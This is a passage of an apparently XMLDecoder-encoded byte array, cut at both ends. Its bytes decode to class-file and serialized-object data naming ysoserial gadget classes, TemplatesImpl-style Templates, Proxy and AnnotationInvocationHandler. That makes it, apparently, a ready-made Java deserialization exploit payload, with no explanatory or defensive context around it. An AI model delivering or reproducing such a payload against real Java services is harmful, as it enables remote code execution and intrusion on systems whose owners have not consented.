index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void 